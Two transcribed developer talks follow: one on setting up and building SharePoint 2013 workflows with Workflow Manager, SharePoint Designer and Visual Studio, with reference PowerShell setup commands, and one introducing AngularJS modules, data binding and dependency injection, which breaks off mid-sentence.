2013 style workflows are not so bad. Let's talk a little bit about setting up workflow manager. Setting up workflow manager is quite easy. Step number one, you have to install workflow manager. On a dev machine, when they RTM'd the product, you could not install it on the domain controller. In Beta 2 you could, but in RTM you couldn't. So I had a little chat with the program manager, and I was like, hey, this is really going to kill a SharePoint developer. You have to allow us to install it on a domain controller, because on our development VMs, we have a domain controller. We don't want to have to run two VMs. SharePoint alone is heavy enough as it is. So they made a little change in the product in literally 14 hours, and they introduced workflow manager 1.1, which you can install on a domain controller. So when you install it, it'll go through some prerequisites and it'll update those on your server. And if you don't have access to the internet, I've included the offline installation command. It uses WebPI, but this offline installation command will basically go through the steps of, you know, it'll download all the necessary components. And I can tell you, on like two images, it gives you like a 404 not found, but everything else is downloaded. And you'll copy this entire installation, take it to your SharePoint server, double-click, install. And I have a book on Amazon, setting up your SharePoint 2013 dev VM, and I detail all the steps in there, including, like, end-to-end setting up your SharePoint VM. So you download workflow manager, double-click on it, start installing it, right? Basically it takes you through a little wizard, right? It's a configure refresh, then after it is installed, it'll present you with a screen like this, right? And this will allow you to set up workflow manager. It's very simple.
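(For reference: the offline installation command the speaker mentions is shown on a slide rather than captured in the transcript. A minimal sketch, assuming the standard Web Platform Installer command line and a Workflow Manager product ID that may differ between releases, looks roughly like the following; run the first command on an internet-connected machine, then copy the folder to the SharePoint server.)

# Download Workflow Manager and its prerequisites into a local folder (product ID is an assumption)
& "C:\Program Files\Microsoft\Web Platform Installer\WebpiCmd.exe" /Offline /Products:WorkflowManagerRefresh /Path:C:\WFOffline

# On the SharePoint server, install from the copied offline feed
& "C:\Program Files\Microsoft\Web Platform Installer\WebpiCmd.exe" /Install /Products:WorkflowManagerRefresh /XML:C:\WFOffline\feeds\latest\webproductlist.xml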
It'll ask you some basic questions like, I need to talk to a SQL Server database, what ports do I want to use, etc. Right? So basically, and you can also join an existing workflow manager farm. So then basically it goes through this wizard, and it gives you the option of doing this through PowerShell if you wish, right? And it'll actually generate the PowerShell script for you. And then you basically set this up, right? So at the end of it, workflow manager is set up. But then you have to do one more thing. And the one more thing that you have to do is to register the workflow manager inside of SharePoint, right? So by default, not every SharePoint site will be able to use workflow manager. You have to explicitly allow it to be used. And I'll tell you, all those historical sites like the blank site and the enterprise, you know, the meeting workspace and all those, they cannot use workflow manager, right? In fact, they've been removed from the user interface, but they're still there. And if you're using a SharePoint site in, like, SP2010 compatibility mode, it'll run fine in SharePoint 2013, but it won't be able to use SharePoint 2013 style workflows. You know, running this will set up two IIS websites. One will be running on HTTP for dev purposes. The other will be running on HTTPS for production purposes. One golden rule about SharePoint 2013: everything should be HTTPS. Everything, including on your intranet. So one of the big changes, as you know, they've introduced is the apps model. I'm here for the rest of the day, if you want to chat about apps or anything SharePoint 2013 in general, I would love to brainstorm with you, right? But as a golden rule, everything in SharePoint 2013, even on an intranet, has to be HTTPS, or I would not consider that a production-worthy SharePoint installation. In fact, they go so far with insisting on HTTPS that when you, you know, export an app out of Visual Studio, they won't let you specify an HTTP URL. Now, of course, you can get around it by, you know, renaming the app file to .zip and editing the XML and all that. But they try very hard to discourage you from basically using HTTP URLs. Dev is fine, production absolutely not. And this is the command you use to pair workflow manager with a SharePoint site collection. Okay? So this is great. I mean, it works. It allows OAuth over HTTP, and that's for dev purposes only. But do you see a big problem with this command? Right? Basically what you have to do is you register at a per site collection level. You can't say this entire web application uses it. So yes, you can run a PowerShell command that runs this in a loop and basically sets this up for all site collections that are currently in existence. But what if you create a new site collection? Right? You have to either run this PowerShell command again or basically write a feature, farm solution, to be able to do that. Right? That's something to keep in mind. So when we talk about workflows, there are three main things to learn from here. We talked about how to set up workflows. We know the history of workflows. Now there are three main things to talk about. Number one, what are the improvements in SharePoint Designer? What does it feel like writing SharePoint 2013 style workflows in SharePoint Designer? Second, what does it feel like to write Visual Studio 2012 workflows? And third, writing a custom workflow activity. Now this talk is just one hour, so I'll try and compress time a little bit. This is my SharePoint environment.
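(For reference: the pairing command shown on the slide is not captured in the transcript. A minimal sketch of what it typically looks like in the SharePoint 2013 Management Shell is below; the server names and URLs are placeholders, 12291 and 12290 are the default Workflow Manager HTTP and HTTPS ports, and -AllowOAuthHttp is the dev-only switch that permits the HTTP endpoint mentioned above.)

# Pair a single site collection with the Workflow Manager farm (dev setup, HTTP endpoint)
Register-SPWorkflowService -SPSite "http://sp/sites/wfs" -WorkflowHostUri "http://wfserver:12291" -AllowOAuthHttp

# Production would use the HTTPS endpoint and omit -AllowOAuthHttp. Because registration is
# per site collection, existing site collections can be covered with a loop like this:
Get-SPSite -WebApplication "http://sp" -Limit All | ForEach-Object {
    Register-SPWorkflowService -SPSite $_.Url -WorkflowHostUri "https://wfserver:12290"
}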
I have central administration running. And I have a team site created. Remember that a blank site can't use these workflows. Even a blank site in 2013 mode can't use these workflows. So you see that I've created a site collection at slash site slash WFS. So this site collection has the ability to run SharePoint 2013 style workflows. I've ran that PowerShell command on it already. So I'm going to go ahead and open, let's say, SharePoint Designer. And I'm going to open this site in SharePoint Designer. So everything is running on my VM. You work with SharePoint to know that, you know, VMs can sometimes misbehave. So I open HTTP sites WFS, and I'm going to look for the workflows node over here. Okay? And click on this. So Golden Rule with SharePoint Designer. Wait for this red thing to go away before you do anything. So here we go. So you see here that I already have a workflow, right? And you see here that I have a bunch of buttons up here. List workflow, pretty much the same as a SharePoint 2007 style workflows. Hardtys everything to a list. Reusable workflow, you tie it to a content type. Site workflow that you don't need to tie to an item, runs at a site collection level. You know, so those are things that are, you know, same as before, right? All these settings are probably pretty familiar to you. They've introduced a couple of interesting things. The import from Visio, they've added the option of importing directly from Visio 2013 diagram. That's the VSDX format. It doesn't need to be, it doesn't need to be a VWI format anymore. So that's an interesting thing. I'm going to go ahead and add a new workflow. I'm going to say new, let's say, let's go with site workflow. Actually, now let's do reusable workflow. So you see here, same as before, with one big difference. You see this content type is all and it's disabled, because I've selected a SharePoint 2013 style workflow. And if I choose SharePoint 2010 style workflows, I can associate it with content types, right? So SharePoint 2013 style workflows can't associate it with content type anymore. So I'm just going to go ahead and create, let's say, a test workflow and click OK. So you see here that it presents me with what they call the text-based view of my workflow designer. And I can, you know, start typing in, you know, activities just like I used to before. So I can say, let's say, so as I type this, I hit enter, you know, it gives me that, you know, these various options, right? I can go ahead and rename a stage, I can choose to add more stages. So I can say, go ahead and add another stage, right? So I can call it first stage. And here I can go ahead and add a second stage. And then let's say add two more stages. So let's say my logic over here is that the first workflow does something like start, then the second workflow checks for something, and then it redirects either to the third stage or the fourth stage. Like a success or a failure. So I'm going to add two more stages, call one of them success, right? And then I'm going to add another stage at the end here. So I got to come in here and add another stage and fail, OK? So I've added these stages and they appear in sequence, but that sequence is actually, you know, arbitrary, because really the workflows are connected to each other through arrows, like, you know, so the sequence over here, the kind that I'm visualizing in my mind is like a Y structure. So first stage, then there's a decision, and then I go to either success or failure, right? 
So how can I visualize this as a Y structure? You know, in the previous version of SharePoint, what I had to do is that I would have to, you know, you know, I would have to export this to like a Visio format, try and visualize it over there. But now I can just go here and I can go to something called as a visual designer view. And in the visual designer view, it is generating the Visio stencils and that the visual designer view will be disabled if you don't have the right version of Visio installed. So since I have that version installed, I can, you know, basically view this like that, right? And I can, you know, I'm going to try to zoom out a little bit so we can see the whole thing, right? So this is how my workflow looks like. If I was to drop activities inside of here, so I can basically start going back and forth between these. So I can go back to the text-based designer and here I can just go ahead and add a log to show you that workflow started, okay? So I added this activity here. I'm going to go back into this visual designer, it's thinking hourglass, and you see here that, you know, the workflow appears inside of here, right? And I can now go ahead and start arranging these in a different way if I wanted to, right? I can say this basically goes down here and this is the Y pattern and, you know, and from here I can go ahead and connect these dots like a connector tool. So I pick this and it's a little tricky. You have to basically hover right on the block where that square appears and connect it from here to here, right? And I can, you know, go ahead and craft up my workflow like this. And then, you know, I can also do something called a generate stage outline. Now I have to resolve these issues. But in a stage outline what happens is that it gives me like a zoomed out view of the workflow. So, you know, it's basically if I want to see the details I go inside the view, but if I want to see an overview I go to a stage outline view, so it just shows me just the outlines of the stages that I don't want to see all the activities inside, right? So I can do all of those things. Let me go back to the text based view. Oh, now it won't let me go there. So let me just create a new one. So I'm going to go ahead and create a new reusable workflow, test two. And I can also go ahead and start introducing loops inside of here. I can try to introduce something called as loop end times or loop with a condition. And, you know, basically, you know, so this is again something that, you know, doing loops has become fairly convenient. And cut-paste, copy-paste, those things also work, right? So I can just go in here and say run this loop, you know, ten times for instance. And, you know, whatever is inside of there will run ten times, right? So writing a workflow in SharePoint Designer has become a lot easier. I've also deployed a custom activity over here. And the custom activity is something called as, you know, it basically goes out to YouTube and fetches some songs. So I can go in here and I can say YouTube. And see, it finds my custom activity inside of here, right? I can enter and then in this custom activity, you know, I can configure it in a certain way that I can pick the category, number of songs, and output to a certain variable type. So I can make this like a drop-down. I can go ahead and say top 20 songs and I can output to this variable called response content. Basically the output type of this particular activity was a new kind of data type. 
They've introduced something called as dynamic data. And what dynamic data allows me to do is that it is great to be able to stuff in hierarchical information like JSON, hierarchical information that I don't know the structure of ahead of time. And then I can work through that information in a syntax that looks very familiar to Xpath, right? It's not Xpath, but it is very similar to that, right? So using that structure, I have the ability to, you know, look through that data. So the response content automatically added a variable for me of data type response content because, you know, it knew that this was the output type. And this has been basically been set up over here, right? I can add more variables. I can access these variables, et cetera. Anyway, that's how you write a workflow in SharePoint Designer. Let's dive into Visual Studio and I'm going to put all these together in a working example at the end. So I'm going to start up in Visual Studio. I'm going to go ahead and create a new project. And I'm going to go into Office and SharePoint and I'm going to go ahead and create a Sandbox solution. You can do this as an app also. Right, so I'm going to go ahead and create a Sandbox solution, right? Click empty project, right? Okay. And that's fine. And I'm going to target slash site slash WFS. Okay. So in here, I can go ahead and I can say right click, add new item. Remember, this is a Sandbox solution and now I have the ability to write, you know, a workflow in a Sandbox solution. But you see that the older project models, the sequential workflow, state machine workflow, still there, these are the SharePoint 2010 style workflows. So I'm going to go ahead and add a regular workflow. I can also choose to add a custom activity, right? And you'll see that the editing experience of both of them is actually quite similar. So I'm going to go ahead and add a workflow. I'll basically make it a site workflow. Hit next. And history list. I'll just, you know, pick the existing history and task list. Hit next. And user will start it manually and hit finish, right? And let's wait for this to load up. Now, you see that there is one big difference that I see over here already. There is no on workflow initiated activity over here, right? In the previous version of SharePoint workflows, 2010 style workflows, I had to be very sure that the first activity was on workflow initiated because like if I put my activity on top of that, basically everything was screwed up, right? My workflow would not run. And sometimes I ran into situations where even if I moved my activity down there, it didn't really fix the workflows. I had to do like a get latest from source control again. Anyway, so you can see here that I can start writing activities inside of here, but I can also do something like create variables, right? So I can create global variables. Let me actually, before I create variables, let me go ahead and drop an activity inside of here. Just any random activity. So let's say create list item, okay? So as I drag drop create list item here, it shows me these exclamation marks. It says one of the children has validation error warning. So list ID was not supplied, right? So I have to specify a list ID here. And now visual studio is frozen. It's basically talking to SharePoint. Okay, right. So I have to specify a GUID. Can I query this GUID in a way? Yes. Basically, it's a simple REST call to be able to query that GUID. And I can drop a HTTP send activity to be able to query that GUID. 
But I'm guessing that when I query using HTTP send, I would want to store that variable, the output of it somewhere. And this HTTP send is going to return me a value and it's going to be JSON. So how do I parse that JSON? So I'm going to create a value or a variable at the global level, at the sequence level. So I'm going to go to variables and I'm going to say JSON output. That will be the name of the variable. And the variable type, I'm going to basically browse for types and I'll search for dynamic. Dynamic value. Okay, here we go. So to support this dynamic value concept, you know, they've added a whole bunch of activities and improvements in the framework to be able to do that. So I added this dynamic value activity and now I can basically say list ID is equal to that, what was the, forgot the variable name now. But I can just type in the variable name here and, you know, that is how I can exchange information between these. I can also go to this HTTP send activity and it's sort of like a composite activity. Basically, I can use like a tree view or a breadcrumb sort of a way to craft my workflow and I can go from one activity to another to another. The cool thing is that everything that I'm doing over here is declarative. What you won't find in here is right click view code. There is no such ability. I can't have code behind to this, right? Completely contained in XAML. This workflow is completely contained in XAML. Now what is it like? So this is, you know, a simple workflow being deployed as a sandbox solution. We'll see a full example later. But let's also see how you can write a workflow activity. So I'm going to say right click, add new item and I'm going to choose to add a workflow custom activity. Now when I choose this, I'm creating the new good kind of activity, the kind you should, right? So the XAML kind of activity. I'm going to click on add and it looks very much like writing a workflow, right? In fact, if you know how to write a workflow, you already know how to write an activity. It's basically the same way I can drag drop, I can build URI, I can get S2S security, token, right? I can do all of these things inside of here. Get S2S security token. They've given us the ability to get that token so we can make an authenticated call into SharePoint when we are running as an app, right? So generally I would want this, you know, above here, right? So I can edit the workflow very, very easily over here. So this is pretty good. How do I deploy this activity? If you go in here and you see that there is this actions for file. I have to do two new things. I basically just edit this actions for file to draft up the details of my activity. There is no visual designer for it. You have to do it by hand, but it's not difficult. And what I do, I pick a file from my C drive and I edit that. That's the easiest way. And I have to come in here and go to the features node and double click on feature two. You see that my activity has been, okay, so they fixed this bug. So this is in the previous preview, they would set this to a site level feature and then my activity would show up. So this has to be a SP web level feature for the activity to show up inside of here, right? So now I can go ahead and package this up as a WSP, hand it over to somebody, and they can deploy it and the workflow can run. So next I'm going to talk about, you know, a functioning example of, you know, writing a full activity and we'll see how exactly that works. 
But before we do that, let's cover some concepts about activities. So we talked about writing workflows in SharePoint Designer. We talked about writing workflows in Visual Studio. Now let's talk a little bit more about custom activities. A workflow is made up of activities. Why did Microsoft give us this ability? Because Microsoft can't imagine every scenario that we may have to deal with. You know, clicking on this button, uproves that travel expense in an ERP system and turns that TV on. Microsoft couldn't get this, right? So we have to have the ability to write these activities. Generally, a workflow is made up of activities. The XAML file, if you were to open up a notepad or right click view code, this is what you will see there, right? So it's basically a sequence and a bunch of activities in here. So you see P, build dynamic value, right? HTTP send, right? So this is how a workflow looks like. And activity, there are two concepts we need to know. Activities and actions, right? So an activity is what we use, right? Is what we use in a workflow is an activity. And an action is what an activity is built on. So an action is like, you can think of it as a, you know, my class library that implements this action, right? So generally speaking, 99 out of 100 times, you'll see there is a one-to-one mapping between an activity and an action. Sometimes there are exceptions, like start a workflow, list workflow or site workflow. Underneath the scenes, it is basically the same action, but with some XAML, we can make it look like two different activities, right? So you define these actions in a new file format called as.actions4, right? It is embedded deep down inside your SharePoint 15 hive. It is farm scoped, but now you can also deploy it as an app or as a sandbox solution, okay? So this.actions4 is a successor of the.actions file. By the way, when you say deploy it as an app, one thing I want to mention, even if you're using provider hosted apps or workflow, you're going to need an app web, right? Because that's where you register the workflows. You need an app web there. So it is a succession of.actions file. It is located at that place, and it basically contains a list of workflow actions or workflow for. This is basically where it lives, right? So you can see the.actions file is there. That's the older kind. And then the.actions4 file is there. So right here, I open that in Notepad, copy an existing activity, and start making changes to it. And this is what the out-of-the-box activities look like. For instance, you see that trim string activity, right? So you see here, it's got something called as I have an action class name assembly applies to all category utility actions, okay? It's pretty self-explanatory what that is doing, okay? Then I say rule designer, sentence, trim percent one, output two, percent two. You know in my activity, I had, you know, download from YouTube in category blah. That blah is a parameter, right? And that parameter, you would say percent one, right? And in percent one, down here, then you can define all the parameters and also the data types of those parameters, right? So this is how you write the.actions4 file. Like, it is XML. Yes, we have to edit that XML. But you see that it's not very hard to edit, right? You see here, this is like one action and I define the rule designer and then I define the parameters. And this basically crafts up my activity, right? So as I mentioned, there are two kinds of activities, declarative and coding activities. 
You know, we should just go with declarative. So I'll just code activity, just avoid it if possible. Already talked about dynamic value, so I'll skip over that. Pre-requisites, write an activity, what do we need? We need SharePoint 2013, we need workflow manager. We need an environment that is running SharePoint. But the good news is that, you know, if you're writing an activity that is completely decorative, you don't even need to run on the SharePoint VM. You can run Visual Studio on a Windows 7 or Windows 8 machine and target Office 365 or target an on-premises environment, right? That will also work. But you do need the developer tools installed, the Office developer tools installed. So let me go ahead and dive into a fully functional example. So this is a custom activity that I've written, that, you know, the same activity that basically gets songs from YouTube. Double click on this activity node. You'll see here that I am, you know, there are two activities inside of this. So one activity has got two activities inside of it. The first is build dynamic value. Second is HTTP send, right? So basically what I'm doing here is I drop these activities and I basically want to be able to craft up like a JSON URL with all the details. And then I do an HTTP send, which is just a JSON API to call a YouTube, right? And this is a URL. And then I basically output that value into a sequence level variable. It is there, believe me, it's somewhere there. It is there, but it outputs the value into a dynamic value type of an output variable. Once I've done that, I've crafted up the logic of my activity. Then I open the actions file and I start crafting up, you know, how this will look like in SharePoint Designer. So when somebody searches for my activity, the sentence I want to show them is search YouTube clips in this category to top block, right? So this is how it will look like in SharePoint Designer. Number two, I basically say that I field bind id is equal to one. So for the first field, right, these are the drop down values that appear, right? So these are the possible values that the user can pick. Then the top end, I say that this is going to be off type, you know, integer and, you know, designer type text area display name top end. And the last one is going to be dynamic value and the parameter data types are declared down here. This one is a string actually, right? So I define the data types, I define my workflow activity like this, right? And you see here that this is getting deployed as a module tag, okay? So basically I copy them into a certain location inside of the content database using SP Web level feature and I deploy this and soon as I deploy this, SharePoint Designer can see this activity. One thing I'll mention to you is that let's say we deploy this and you don't see this activity in SharePoint Designer, okay? What SharePoint Designer does is that when you open SharePoint Designer, it downloads all the data in the SP Web, okay? And it caches that deep inside of your C user data folder somewhere, right? And if you don't see the activity, you need to go in there manually and delete that cache and then open the site again in SharePoint Designer and you'll see it. There's a little issue in SharePoint Designer. So now I've crafted up a workflow based on this activity. I'm going to click on Edit Workflow. So as you see here, that my workflow has got one stage and it's got one step and a loop, okay? And step number one is I'm calling YouTube, right? 
And I basically search in the Music category, Top 10, Output to this variable, right? Then I've created a global variable called Index, right? Index, the purpose of this index variable is that I've gotten the first 10 songs. I'm going to run a loop 10 times and I'm going to increment Index one by one. And I want to be able to find this particular data from the output JSON value, right? So this workflow knows a little bit about the JSON structure. If the JSON structure changes, my workflow will break. But if the workflow breaks, it actually gives you a decent place to see the full exception message now. Basically, the workflow history shows you like an exclamation mark. You hover on it, shows you a tooltip with a full exception text. And it's actually pretty easy to read. Variable response content, output variable title, okay? And then I create a list item in a list that I've already created, right? And output this to a variable called Create, okay? So then I increment the loop count and then I rerun the loop, right? So when the loop runs 10 times, I've extracted all the items. And basically that's all I need to do. Then I would save this workflow, I would publish this workflow, and now I have the ability to run this workflow. So I'm going to go to my SharePoint site. This is a YouTube list. I don't see any data in here right now. I'm going to go ahead and visit that site in a separate tab. I'm going to say site-level workflows. I'm going to go to Site Contents, and I will look for Site Workflows. And I will start this workflow. So hopefully I am online. Hopefully, we'll see. Yeah, so I am online. And if we give it a minute or so, you see that it was able to download the first 10 songs, top 10 songs. Looks like Gangnam Style is on top again. So I was able to get the top 10 songs from YouTube and put them inside of this list. I was able to achieve this with Zerocode. I can use another new facility in SharePoint 2013 to create a view on this list using a new facility they've introduced called JS Link. Writing a view using JS Link is extremely simple. The good news over there is that I can write a view in JavaScript. I don't have to do it in XSL because you can't debug XSL. So if I do this in JavaScript, I can set a breakpoint. I can see what's going on. I can use CSS. I can use JavaScript. You know, that's how we write views in other platforms. Now you can do that in SharePoint. And I could easily also save the URL of the video. That's part of the JSON feed and render that as YouTube clips. That would maybe take 10 minutes to do. If I had the embed tag ready, it would probably take 10 minutes to do. So it's very easy to be able to set up something like YouTube or whatever scenario that you may envision. You can do that very, very easily using Workflow Foundation now. Okay. Last tips. I have seven minutes left. It will open for questions. A couple of best practices. Number one common mistake I've seen with Workflows is to use a Workflow history list as an audit log. Because you know, you say, hey, Workflows are great because if anybody changed something, you can go in there four months later and look at the audit log and see who changed it. Right? Okay, sounds good in theory. The problem is, Workflow generates a lot of audit logs and that audit log list is going to get bigger and bigger and bigger and bigger. Right? So the Workflow history list, what you have to do is you should set a policy on that to move items out of that and archive them somewhere else. Okay? 
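To make the JS Link idea mentioned above concrete, here is a minimal sketch of a client-side rendering override — this is my illustration rather than the speaker's code, and the list field name and markup are assumptions; the SPClientTemplates API shown is the standard SharePoint 2013 JS Link entry point.

    (function () {
        var overrides = { Templates: {} };

        // render each row of the view in JavaScript instead of XSL
        overrides.Templates.Item = function (ctx) {
            var title = ctx.CurrentItem.Title;   // assumes the list has a Title column
            return "<div class='song'>" + title + "</div>";
        };

        SPClientTemplates.TemplateManager.RegisterTemplateOverrides(overrides);
    }());

You would reference a script like this from the JS Link property of the list view web part, which also means you can set breakpoints and debug it like any other JavaScript.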
There's a list of millions of items. Not a good idea. Number two, keep initiation activities to a minimum. Right? So when the workflow starts and the first activity, you just have basically like a placeholder activity. And the end user perception will be that the workflow started quickly. You know that's working on its spinner. You won't see that for a long time if you don't have a heavy initiation activity. Number three, for very large lists, when you upload a new version of a workflow, set the old version of the workflow to no new instance. Because if you were to not do that, basically if you remove the workflow association, it basically, you know, removes that column that is associated with the workflow. And removing the column, the time taken for that is directly proportional to the number of items that you have in a list. Right? So if you have a very large list, remove instances in the middle of night. Right? During business hours, set it to no new instances. And obviously, don't let workflow manager or any of the S2S certs expire. There's some PowerShell scripts out there that you can run easily on your farm and find out exactly what certs are about to expire. And that is something that you should diligently do, because then this is a problem we'll run into. You can analyze workflows in two different places. They've added, this is new in 2010, 2013, that they've introduced a category called Microsoft-Workflow. Any errors, etc., in workflow foundation will show up there. And a second location is that they've, in the database in workflow instance management DB, there is a table called debug traces. It is perfectly okay to run a select out of this. You can run a select out of this. And if there are any issues that you're trying to diagnose around workflows deep down, you can do that from here. Here are a couple of links and references that I've included, and you'll get a copy of all of these slides, or just email me and I'll send you this list. But these are, if you're interested in SharePoint 2013 style workflows, in SharePoint or even otherwise, this is a very good reference for that. And please leave a feedback. Hopefully it's green. And I'd love to take any questions at this point. And thank you for attending.
|
So is the 2013 story any better? A rundown of what I like about SP2013 workflows, and what I don’t (which is very little).
|
10.5446/51503 (DOI)
|
Hello out there. Can you hear me? Yes. Okay. My name is Scott Allen and this is a talk on AngularJS. I usually skip some of the opening formalities. I assume if you're here you know what Angular is about. It's a framework for building complex client-side applications. If you do a search for it you'll find out the AngularJS website where you can download the framework. You can find the documentation. You can find some samples. And basically what I wanted to do today was walk you through some of the primary abstractions of AngularJS and show you how to build an application using things like directives and filters and data binding expressions, all those sorts of things. We will start with an empty page which is my default.html page. Currently this page just has some styles included. It has this funny little expression with the double mustaches, 2 plus 3. We haven't included Angular yet. And so right at this point that's the test. We haven't implemented anything yet so they all fail. Right now it just displays that 2 plus 3. So we'll include Angular. We just need Angular and a script that I'm rating in. No jQuery required. We'll talk about that later. Include Angular. Just doing that doesn't give us anything yet because once you have the Angular script included what you need to do is start adding directives to your HTML. So directives are these Angular abstractions that integrate very tightly with the DOM. You add a directive using typically ng-attributes. I'll show you how to build a custom one later. This is me saying dear Angular, please take control of this body DOM element and everything inside of it. And what Angular will do is it will look for directives like ng-app which you can also, by the way, if you're into HTML5 data validation or HTML5 validation you can add a data-prefix to that. It'll find that attribute and look through what it controls now, everything inside of the body, and look for other directives and expressions like 2 plus 3, compile them, evaluate them. So I refresh the page now and I get a 5. So this is not JavaScript that I'm rating inside of here. It's a subset of JavaScript that Angular will understand inside of these data-binding expressions which is the double mustaches. It'll look for those things, evaluate them. Typically what you don't do is hard code things, of course. Typically what you do is you have some sort of model. So there's the concept of models which is the data that you want to put onto the screen. Controllers which initialize the model. So we'll get into that. So first of all, typically don't do this. Let me do something a little more interesting. Let me have a div that's going to data-bind against something called name. And let me have an input type text that will use another directive, ng-model. So I can say data-ng-model. And that is going to also look at something called name in my model to figure out what it should display in that input. And what I want to show you first of all is an example of 2A data-binding. The fact that I'll be able to type into the input, it'll update something called name. It's also displaying in this div. And before we all do that, I'll make this a little more formal and say that I want a specific application. So an application that I'm going to configure with routes and controllers, I'll just call it myApp. But now as soon as I do that, Angular is going to start looking for something called myApp. So we're going to write that in the JavaScript. 
I'll create a independently, or immediately invoked function expression in iffy. Once I apply the proper curly braces here, it gets invoked. It gets closed off. I'm going to say the application is an Angular.module called myApp case sensitive. And this is how you create a module in Angular. So a module is simply an abstraction that you can use to group together different components. Some of the things we'll be looking at later, like controllers, filters, directives, services, you can put them into modules. The advantage of doing that is then that modules have configuration code that can run, that can get bootstrapped. We'll see how dependency injection works with modules. This is the name of the module. This is the list of dependencies for my module, just an empty array because I don't depend on anything else as yet. That will create that module and then I can do things like create a run function. So app.run is the ability to register a function with Angular to say this is a piece of code to execute when this application is up and running. I'll actually create that as a separate function as first. So run is a function. And I'm going to throw in two parameters to this. One called root scope and one called log. And we're simply, first of all, just going to log that the application is running. And I'll explain what these parameters are and why they're named that way, but then I'll register this run function. And I think if I did everything right, I should be able to also say root scope dot name, initialize this name property that we're going to be displaying and data binding against. We could just say it's the app. Save everything. Refresh the page. There's the app and the app in the div and you can see the application is running. So we executed our run code. I should be able to type in here now. Scott Allen. And that's one of the big benefits of Angular, the ability to have very simple pieces of JavaScript model that I can just inside of the view that has no idea what the model exactly is. Inside of the view, it can have these data binding expressions and say, I'm going to take this name and put it into an input, put it into a div. When the name changes, I want Angular to automatically keep things in sync and update the DOM elements and do all that good stuff, right? The way I'm doing that right now is I'm attaching something to an object known as root scope. So Angular is very interesting. It's a very interesting framework. It has a lot of concepts like dependency injection. When you put parameters on a function that Angular is going to call, Angular can actually analyze those parameters and figure out what you're asking for. So this one's a little easier to understand, the second parameter actually log. I'm asking Angular for the built-in log service that it has. And you can replace that service, you can decorate that service, you can do all sorts of interesting things with it. But the built-in service that comes with Angular, when you call.log or.worn or.error, what it will do is write something to the console, console.output if it's available. So there's an actual dependency injection component behind the scenes that when this function runs, it says, oh, $log, you need the log service. And it literally is looking at it by name because in JavaScript, we don't really have types. You know, in C-sharp, if you've done dependency injection, you're probably used to injecting an i-logger, an i-repository, things like that. 
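A minimal sketch of the module and run block being described; the module name "myApp" and the model value come from the talk, the rest is illustrative.

    (function () {
        var app = angular.module("myApp", []);     // second argument: the module's dependencies

        var run = function ($rootScope, $log) {
            $log.log("the application is running");
            $rootScope.name = "the app";           // visible to every child scope via prototypal inheritance
        };

        app.run(run);                              // executed once the module has been bootstrapped
    }());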
But there's a type there that an inversion of control container can look at and say, oh, you need the i-repository, let me look that up by type name. I found one, I'll give it to you. JavaScript, we don't really have types. So it's literally looking at the name. So one thing to be aware of right from the start is what happens when a minifier runs on this code and changes these things. I was just going to give you a really quick demonstration of that because I'm using bundling and minification inside of ASP.nmvc4. And if I look at my bundle config, I have a bundle defined for my script. You don't really have to be familiar with MVC4 to understand what's going on here. But if I reference this URL, I will be getting a script that is minified. That's the big difference. It's been minified. So you know, a minifier likes to change local parameter names to make them as short as possible. Let's see what happens if I go into my default at html and instead of including my script, let's include this name, which was bundles my script. So script source equals bundles my script. I think that should work. Run this again. And we will get an error. So whenever you see something like this, unknown provider, n provider, that's Angular's way of saying that you just wrote a function that has a parameter named n and I have no idea what n is. So how do you deal with minification? We could actually look at our minified source code and see that in there. If I look at my scripts, so there was my run function that was rewritten with two parameters, n and t, to make them short. All right. So how do you fix that sort of problem? There's a couple different approaches. One, actually, I can think of three. One is to use an Angular friendly minifier. I forget the name of it. I'm sorry, you can Google that. Another approach is to do what's known as what they call annotate this function. So any function that the dependency injector is going to work against, you can give that function a property $inject. And inside of $inject, you can give it the array of things that that function will require. Right now, we're requiring root scope and we're requiring log. And the injector will look at that instead of the actual parameter name. So I could call this anything now. I could call it n or l or what have you. Just doing that should fix my problem. Let me just do one little thing because it aggressively caches these scripts. Let me just add a little query string to make sure we get a new version of the script. Yeah. So application is running and we're back up data binding and so forth. If that makes sense. Am I making any sense? Sometimes it's hard to tell when you can't see people. But cool. Let me not use the minified script just because it does get aggressively cached and then that throws things off. We'll go back to just using my script.js. All right. So that's a little bit about dependency injection. Angular does dependency injection. So if you want to write unit tests, have a fake log service, very easy to do and you can make sure that things like the application are actually calling into the logger. But this is typically not what people do. Typically people don't put their model in the application. Typically what you do is you write a controller. So I want to have a controller called a numbers controller that is actually responsible for this part of the DOM. 
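A sketch of the $inject annotation being described, which keeps the injector working after a minifier renames the parameters; the inline array syntax shown in the comment is the other common form. (The Angular-friendly pre-minification tool the speaker could not recall is presumably ngmin, which rewrites code into this minification-safe shape for you.)

    var run = function (rs, l) {                   // parameter names no longer matter
        l.log("the application is running");
        rs.name = "the app";
    };
    run.$inject = ["$rootScope", "$log"];          // the injector reads these strings instead
    app.run(run);

    // equivalent inline array syntax:
    // app.run(["$rootScope", "$log", function (rs, l) { /* ... */ }]);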
It's going to be responsible for setting up a name, calling a web service to get the name and then setting that in the model and then Angular will take care of displaying it here and updating it from this input. So if I have a numbers controller, of course Angular is going to go out and look for a numbers controller. So I'll have to write that next. So back in my script.js. I'm going to put this in a separate iffy. Not because that's required. Just because I want to demonstrate that you could put the application in one js file and the controller in another js file and organize your application however you want and use different folder structures. So this isn't required just doing this here to make a point. I am going to pass in. I know I want the Angular module called myApp. So I want to get a reference to that module that I've already defined. MyApp. So no second parameter here. That would try to recreate it. I just want a reference to myApp. Pass that in as the module to this function. And then ultimately what I have to do is register a controller. The numbers controller. So numbers controller could look like this. Numbers controller is a function. And let me make sure I try to spell everything. Right. It would be 2Ls not 2Rs. Right. Yes. This one we could also give it a scope and a log. And let's say log that numbers controller is up. Up and running. Scope.name equals scott. We should also provide the injection here. Copy that. Just in case it gets minified. So what we're asking for this time is scope and log. I'll explain the difference between root scope and scope here in a second. And let me comment out this line temporarily. It's our controller that's going to be responsible for setting up that scope. And then finally module.controller. I'm telling Angular there is a new controller to be aware of. The numbers controller which when someone asks for the numbers controller here's the function to invoke to set things up. So doing that and refreshing. Hopefully. Oops. Let's see what did I do. Oh run is not defined. Let's see what I did up here. That's interesting. Run where? Oh. Yeah. Yeah. Yeah. Thank you. This should have been numbers controller.inject. We're annotating that function. Very good. So we're working. Thank you, sir. So that's still working. All right. So a little bit later we'll call a web service. We'll get some data. We'll bind it into the page. But before we do that I really want to explain the concept of scope in Angular because it's extremely important. When you set up an HTML page and you put these directives in place like data.ng controller, what you're telling Angular is that this controller is responsible for this part of the DOM. And so any expressions that are inside of here are going to use the scope that is defined by that controller. And you can have controllers inside of controllers and controllers inside of applications. And the important thing to understand 